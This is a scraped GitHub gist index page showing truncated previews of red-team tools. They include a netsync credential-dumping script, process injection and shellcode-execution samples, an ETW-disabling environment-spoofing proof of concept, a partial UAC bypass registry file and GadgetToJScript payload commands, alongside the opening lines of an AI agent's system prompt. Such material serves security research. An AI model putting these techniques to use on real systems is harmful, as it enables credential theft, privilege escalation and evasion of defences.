This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| You are Manus, an AI agent created by the Manus team. | |
| You excel at the following tasks: | |
| 1. Information gathering, fact-checking, and documentation | |
| 2. Data processing, analysis, and visualization | |
| 3. Writing multi-chapter articles and in-depth research reports | |
| 4. Creating websites, applications, and tools | |
| 5. Using programming to solve various problems beyond development | |
| 6. Various tasks that can be accomplished using computers and the internet |
ThePirateWhoSmellsOfSunflowers
/ netdumper.py
Last active
July 1, 2025 14:39
This script perform a netsync attack. No SMB involved
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from impacket.dcerpc.v5 import epm, rpcrt, transport, nrpc, samr | |
| from impacket.uuid import bin_to_uuidtup | |
| from impacket.crypto import SamDecryptNTLMHash | |
| from impacket.nt_errors import STATUS_MORE_ENTRIES | |
| from impacket.dcerpc.v5.rpcrt import DCERPCException | |
| from binascii import unhexlify, hexlify | |
| from random import randbytes | |
| import sys | |
| import argparse |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import time | |
| import sys | |
| from base64 import b64encode | |
| from requests_ntlm2 import HttpNtlmAuth | |
| from urllib3.exceptions import InsecureRequestWarning | |
| from urllib import quote_plus | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
jfmaes
/ DInjectQueuerAPC.cs
Created
November 13, 2020 19:00
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |
fnmsd
/ FindClass_dfs1.java
Created
June 26, 2020 06:01
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package aa; | |
| //Author:fnmsd | |
| //Blog:https://blog.csdn.net/fnmsd | |
| import javax.servlet.http.HttpServletRequest; | |
| import javax.servlet.http.HttpServletResponse; | |
| import java.lang.reflect.Field; | |
| import java.util.HashSet; | |
| import java.util.Scanner; |
xpn
/ env_var_spoofing_poc.cpp
Created
June 6, 2020 21:25
A very rough x64 POC for spoofing environment variables (similar to argument spoofing) with a focus on setting the COMPlus_ETWEnabled=0 var used to disable ETW in .NET
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on | |
| // setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET. | |
| // | |
| // Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables, | |
| // and then resuming the process. | |
| // | |
| // (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/) | |
| #define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0" | |
| #define INJECT_PARAM_LEN 43 |
TheWover
/ EtwpTest.cs
Created
May 6, 2020 22:03
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace EtwpTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
homjxi0e
/ SLuiUACbypass.reg
Created
May 3, 2020 21:30
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\Software\Classes\Launcher.SystemSettings] | |
| @="Open" | |
| [HKEY_CURRENT_USER\Software\Classes\Launcher.SystemSettings\Shell] | |
| [HKEY_CURRENT_USER\Software\Classes\Launcher.SystemSettings\Shell\Open] | |
| @="Open" | |
| "MuiVerb"="@appresolver.dll,-8501" |
asolino
/ gist:45095268f0893bcf08bca3ae68a755b2
Last active
May 28, 2020 10:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import argparse | |
| import string | |
| import sys | |
| from impacket import nmb | |
| from impacket.smb3 import SMB2_COMPRESSION_TRANSFORM_HEADER, SMB3, SMB2_DIALECT_311, SMB2_NEGOTIATE_SIGNING_REQUIRED, \ | |
| SMB2_NEGOTIATE_SIGNING_ENABLED, STATUS_SUCCESS, SMB2_DIALECT_30, \ | |
| SMB2_GLOBAL_CAP_ENCRYPTION, SMB2_DIALECT_WILDCARD, SMB2Negotiate_Response, SMB2_NEGOTIATE, \ | |
| SMB2Negotiate, SMB311ContextData, SMB2NegotiateContext, SMB2_PREAUTH_INTEGRITY_CAPABILITIES, \ |
3xpl01tc0d3r
/ GadgetToJScript Command Reference
Last active
November 13, 2024 16:03
GadgetToJScript Code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Command to generate HTA code using GadgetsToJScript | |
| GadgetToJScript.exe -w hta | |
| # Command to generate JS code using GadgetsToJScript | |
| GadgetToJScript.exe -w js | |
| # Command to generate VBS code using GadgetsToJScript | |
| GadgetToJScript.exe -w vbs | |
| # Command to generate VBA code using GadgetsToJScript |
NewerOlder